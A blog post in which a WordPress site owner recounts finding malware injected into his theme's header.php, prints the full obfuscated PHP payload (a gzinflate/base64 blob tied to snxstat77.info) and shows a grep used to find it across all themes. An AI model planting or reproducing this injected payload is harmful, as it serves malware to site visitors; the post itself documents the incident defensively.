My WordPress header.php Got Hacked – snxstat77.info
Today I went to see some analytics and noticed that traffic was unusually down. I went to a popular wiki page that usually drives a lot of traffic to check if my link was there. It sure was, but when I clicked on it chrome gave me a malware warning!
XSS Hack (cross site scripting)
If you do a search for the offending website snxstat77.info you will not find anything. So I looked at the live DOM via chrome tools (or you can use firebug) to search for the site, and sure enough I found it.
#32d494# echo(gzinflate(base64_decode("zVZtb5swEP4ts5CAotDYYF7msn2I9gv2McqHvMCgSkMCbqsm6n+fzy+EpE3Kqk2aFIh9 vrvnzvfC3bXLptryb7x5OeyyVb18fMg33F82+ZznP9Y57By0Qh6qxPOEXLbz59ttvllNymq9cnYeErTX5ZwvS2f37B7KbDTG5Ja yV1C5bWpe85dtblgWTb5o3EPLs5+8qTa/2H6f2fO1Lf/3T7bfPi5a3jiYBCNMiOvt96xts+mMFZldNLZn1w/iNSltVnhCspmoRb 3Kbfac8bJqWZ49T4spUprQzMEY1MzYJkOBTy14KIbX2MLUwqkVphYNBSFMgBrDC5jCFFahoFiECO6OFFuBVBLo/RkzjQBFSAApx FYoNYJ4kOhNJyHQcSKhtQmpEpNELBUAmQgoaigRqKLak3OPaHQOISiAAkuSnElGIIUNY6BMV4ZdwBl2V4nCVUbFR1cji6RXTMVU WQAnoIJ0V0GxvFnxAy8EBpwS3/AL4FQvY61UGAJ79SIaNJS4oRFWt0y1vVi7FwPaEZoEKgAdM9beYhNWZdwVCW0YTXtZ0/Mt0bq izgpDCborpCp+EksbKn/KKxVYqlw76pGu+IYMbOpyQH/U0QMdRx0npcvk9li6loA76iDWUrRPlX4EY4iuisrFEAsmHF3Lxj5Boi vTw+Qdf/DAvH+/YkwxRlKPbAYkNfUwIMtDneWSGvav8Gp7MCV/pQy64ldXNJYJHPX7j4lu3JUZxDQ+K7fEPysolZ7439fUe8a/q QDyJ6l/0greVoDybADix0XSIX1cK4NRT8up1ymGq+gV3ofyn8mTtz3wJFtOm9rfSs4LvXQQ8qe+TP/DVxx6R6wb9hFTCAWkl9/S MFANreliv0RTx8nd76hFX8Uk5qGtGNPWFRdjD5pb3eGjPjUTkeuyom6cKotGZIThYdWI0uBLNmaV57mH+6xiVeG03BXTV9t6Lfe Lpn6YlGLiErOWM8I35Y2DPXyzmd7PhLrXnWBjubMTy7tbPVX+Bg=="))); #/32d494#
Investigating the Hack
I am still in the middle of figuring out where the vulnerability is on my site. I recently (2 days ago) updated my WordPress install to 3.3.2 (newest) and this is the first time I have been hacked. Not sure if WordPress is to blame or not, either way I would like to find out how this happened.
I found this blog post that seems to explain what happened to my WordPress install. I also changed my password on my server and ftp accounts. Then I did a search to see how far this little hack has gone.
grep -R 'echo(gzinflate(base64_decode(' *
This revealed that ALL my WordPress themes were hacked.
So far it doesn’t look like a WordPress flaw, but more like my SSH/FTP account had been compromised. Then the intruder, noticed I had a WordPress site and decided to inject all my themes.